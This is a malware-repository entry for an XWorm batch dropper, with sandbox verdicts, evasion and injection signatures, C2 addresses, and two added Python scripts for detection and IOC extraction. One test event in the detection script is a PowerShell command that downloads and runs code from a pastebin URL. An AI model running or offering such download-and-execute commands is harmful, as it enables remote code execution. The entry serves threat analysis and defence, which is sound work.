MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

XWorm
Vendor detections: 11



SHA256 hash: 50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444
SHA3-384 hash: 8455af02f9148c200cd2f0a660917fd873f38192c9da46ab7f349aca141f68207e2e3e8cf610ca78128804954681986f
SHA1 hash: 1c1d9191fa40f956e55ff706e41b09e5d28f8697
MD5 hash: 7426f8af3d4ff5cd700ce26af4c497e3
humanhash: september-fanta-winter-cola
File name: WRONG IBAN.bat
Signature: XWorm
File size: 204'284 bytes
First seen: 2025-08-13 11:54:55 UTC
Last seen: 2025-08-13 12:54:42 UTC
File type: Batch (bat)
MIME type: text/plain
ssdeep: 3072:GegBI0HWavWj3Q3IxFS1BqpWhOo9qUef2A4jvYVz8NF2pUNyvdbbS:G9I0HWuWj3Q31Bqp1op421UVz9pUaBu
TLSH: T1771418BECAB9EDC007AF78D8954E3B4A108D4B83FA750B2DF8E124B21A145459F7A54C
Magika: vba
Reporter: smica83
Tags: 193-187-91-114--60875 bat xworm

Intelligence


File Origin
# of uploads: 2
# of downloads: 56
Origin country: HU
Vendor Threat Intelligence

Malware family: n/a
ID: 1
File name: WRONG IBAN.bat
Verdict: No threats detected
Analysis date: 2025-08-13 05:08:03 UTC
Tags: n/a
Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample

Verdict: Malicious
Score: 90.2%
Tags: autorun shell spawn sage

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: base64 evasive obfuscated powershell

Result
Threat name: n/a
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Creates a thread in another existing process (thread injection)
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Drops script at startup location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
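The four Sigma matches in the list above (Base64 Encoded PowerShell Command, PowerShell Base64 Encoded FromBase64String Cmdlet, PowerShell Base64 Encoded IEX Cmdlet, Drops script at startup location) are checks a detection engineer can reproduce over process-creation and file-write telemetry. Two details matter in practice: powershell.exe accepts any prefix of -EncodedCommand (-e, -enc, ...) and the blob is base64 of the UTF-16LE script, so the IEX/FromBase64String checks have to run on the decoded text rather than on the raw command line. The Python below is an added example, not MalwareBazaar's or any sandbox vendor's code; the events, the pastebin URL and the Startup-folder path in it are constructed to resemble the behaviour in this report and are not taken from the sample.

```python
"""Detection checks modelled on the Sigma rule names in the sandbox report
(base64-encoded PowerShell command, FromBase64String/IEX inside it, script
dropped to a Startup folder). Added example; sample events are constructed."""
import base64
import binascii
import re

# powershell.exe resolves any prefix of -EncodedCommand (-e, -en, -enc, ...) plus -ec.
_ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
# "-flag <base64 token>" (token optionally quoted); tokens under 16 chars are ignored.
_FLAG_RE = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+[\"']?([A-Za-z0-9+/=]{16,})")
# Whole tokens that look like base64: judged after decoding, never as plain text.
_B64_TOKEN_RE = re.compile(r"(?<!\S)[\"']?[A-Za-z0-9+/=]{16,}[\"']?(?!\S)")
_IEX_RE = re.compile(r"(?i)(?<![\w-])(?:iex|invoke-expression)(?![\w-])")
_FROMB64_RE = re.compile(r"(?i)FromBase64String")
# Matches both the per-user (AppData\Roaming) and all-users (ProgramData) Startup folders.
_STARTUP_RE = re.compile(
    r"(?i)\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:bat|cmd|vbs|js|ps1|lnk)$")


def encode_command(script):
    """What -EncodedCommand expects: base64 of the UTF-16LE script (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (any accepted abbreviation), else None."""
    for flag, blob in _FLAG_RE.findall(cmdline):
        if flag.lower() not in _ENC_FLAGS:
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # malformed blob: not a valid encoded command
    return None


def analyze_process(cmdline):
    """Sigma-style checks on one process-creation command line; returns finding names."""
    findings = []
    visible = _B64_TOKEN_RE.sub(" ", cmdline)  # readable part of the command line only
    if _IEX_RE.search(visible):
        findings.append("iex_in_command_line")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("base64_encoded_powershell_command")
        if _FROMB64_RE.search(decoded):
            findings.append("frombase64string_in_encoded_command")
        if _IEX_RE.search(decoded):
            findings.append("iex_in_encoded_command")
    return findings


def analyze_file_write(path):
    """Flag script/batch files written to a Startup folder."""
    return ["drops_script_at_startup"] if _STARTUP_RE.search(path) else []


def analyze(events):
    """events: dicts {"type": "process", "cmdline": ...} or {"type": "file", "path": ...}.
    Returns {event index: [findings]} for every event that triggered a check."""
    report = {}
    for i, ev in enumerate(events):
        hits = analyze_process(ev["cmdline"]) if ev["type"] == "process" else analyze_file_write(ev["path"])
        if hits:
            report[i] = hits
    return report


# Constructed, hypothetical events modelled on the behaviour in the report (not from the sample).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
        "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGVsbG8=')))")},
    {"type": "process", "cmdline": 'cmd.exe /c powershell -Command "Get-Date"'},
    {"type": "process", "cmdline": "powershell.exe -EncodedCommand " + encode_command("Get-Process | Out-Null")},
    # hypothetical pastebin raw URL, placeholder path
    {"type": "process", "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')\""},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2520.bat"},
    {"type": "file", "path": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_EVENTS).items():
        print(idx, hits)
```

Feed it the CommandLine field of Sysmon Event ID 1 or Security 4688 records and the TargetFilename of Sysmon Event ID 11 records. The encoded-command checks are deliberately separate from the plain-text IEX check: grepping a raw command line for "iex" both misses encoded payloads and can false-positive on a base64 blob that happens to contain those letters.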
Behaviour
Behavior Graph (ID 1755986; sample WRONG IBAN.bat; start date 13/08/2025; architecture WINDOWS; score 100). Information recoverable from the graph text:
Process tree: the batch file starts cmd.exe, which spawns nested cmd.exe/conhost.exe chains (a large number of processes in total) flagged "Suspicious powershell command line found"; the payload stage then launches chrome.exe and msedge.exe, which account for most of the later network traffic.
Network: pastebin.com (104.20.29.150, port 443, CLOUDFLARENET, United States; flagged "Connects to a pastebin service (likely for C&C)"); 193.187.91.114 (ports 49718 and 60875, OBE-EUROPE Obenetwork Europe, Sweden); gce-beacons.gcp.gvt2.com; 192.168.2.4 (sandbox-local); 239.255.255.250 (multicast, listed as Reserved); s-part-0012.t-0009.t-msedge.net (13.107.246.40), ax-0001.ax-msedge.net (150.171.27.10) and 13.107.253.40 (MICROSOFT-CORP-MSN-AS-BLOCK, United States), contacted by msedge.exe; plus several other IPs or domains not named in the graph.
Dropped files: C:\Users\user\AppData\Roaming\...\2520.bat, ...\81f0.bat, ...\8a8a.bat, ...\afab.bat, ...\156b.bat, ...\5fad.bat, ...\99dc.bat (all ASCII), plus further files the sandbox marked malicious.
Signatures attached to graph nodes: Queries sensitive video device information (via WMI, Win32_VideoController); Drops script or batch files to the startup folder; Writes to foreign memory regions; Maps a DLL or memory area into another process; Suspicious execution chain found; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file.
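The Tags line of this entry carries the C2 endpoint in MalwareBazaar's ip-port tag convention (193-187-91-114--60875), while the behaviour graph lists every IP, port and domain the sandbox saw, including the analysis host's own source ports and the browser traffic from the chrome.exe/msedge.exe the payload spawned. The Python below is an added example, not MalwareBazaar's or the sandbox vendor's code: it parses the tag and the graph's network lines into a deduplicated IOC set. The input strings are copied from this entry; the rule that ports in the Windows dynamic range (49152 and up) are the sandbox's source ports unless a tag confirms them as a destination is an assumption of this example.

```python
"""Turn a MalwareBazaar ip-port tag and sandbox behaviour-graph network lines
into blockable IOCs. Added example; not MalwareBazaar or sandbox code."""
import ipaddress
import re

# Inputs copied from this entry (graph lines as extracted on the page).
TAGS = ["193-187-91-114--60875", "bat", "xworm"]
GRAPH_LINES = [
    "193.187.91.114, 49718, 60875 OBE-EUROPEObenetworkEuropeSE Sweden",
    "pastebin.com 104.20.29.150, 443, 49717 CLOUDFLARENETUS United States",
    "192.168.2.4, 443, 49710, 49717 unknown unknown",
    "239.255.255.250 unknown Reserved",
    "s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49747, 49772 MICROSOFT-CORP-MSN-AS-BLOCKUS United States",
]

# MalwareBazaar tag convention: dotted quad with '-' for '.', then '--' and the port.
_TAG_RE = re.compile(r"^(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})--(\d{1,5})$")
# "[hostname ]ip[, port]* <asn> <country>" as the graph text renders a network node.
_LINE_RE = re.compile(
    r"^(?:(?P<host>[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,})\s+)?"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?P<ports>(?:,\s*\d{1,5})*)")
EPHEMERAL_START = 49152  # assumption: Windows dynamic range, used for source ports


def parse_ip_port_tag(tag):
    """'193-187-91-114--60875' -> ('193.187.91.114', 60875); None for any other tag."""
    m = _TAG_RE.match(tag)
    if not m:
        return None
    ip, port = ".".join(m.group(i) for i in range(1, 5)), int(m.group(5))
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return None
    return (ip, port) if 0 < port < 65536 else None


def routable(ip):
    """True for addresses worth blocking: not private, loopback, link-local, multicast or reserved."""
    try:
        a = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_multicast or a.is_reserved)


def extract_iocs(tags, graph_lines):
    """Return {'domains', 'ips', 'ip_ports'} sets. Dynamic-range ports are dropped as the
    sandbox host's source ports unless an ip-port tag confirms them as a destination."""
    confirmed = {t for t in map(parse_ip_port_tag, tags) if t}
    iocs = {"domains": set(), "ips": set(), "ip_ports": set(confirmed)}
    for line in graph_lines:
        m = _LINE_RE.match(line.strip())
        if not m or not routable(m.group("ip")):
            continue
        ip = m.group("ip")
        iocs["ips"].add(ip)
        if m.group("host"):
            iocs["domains"].add(m.group("host").lower())
        for port in map(int, re.findall(r"\d+", m.group("ports"))):
            if port < EPHEMERAL_START or (ip, port) in confirmed:
                iocs["ip_ports"].add((ip, port))
    return iocs


if __name__ == "__main__":
    for kind, values in extract_iocs(TAGS, GRAPH_LINES).items():
        print(kind, sorted(values))
```

The output still contains the Microsoft hosts reached by the spawned msedge.exe; the routability filter only removes addresses that cannot be C2, so the remaining set should be triaged against ASN and known-good lists before it goes into a blocklist. Note that the tag is what disambiguates 60875 as the destination port: by number alone it is indistinguishable from the 49718 source port on the same line.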
Result
Malware family:
Score: 10/10
Tags: family:xworm execution rat trojan
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Drops startup file
Blocklisted process makes network request
Detect Xworm Payload
Xworm
Xworm family
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Sus_CMD_Powershell_Usage
Author: XiAnzheng
Description: May contain (obfuscated or not) PowerShell or CMD commands that can be abused by a threat actor (can create FPs)

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments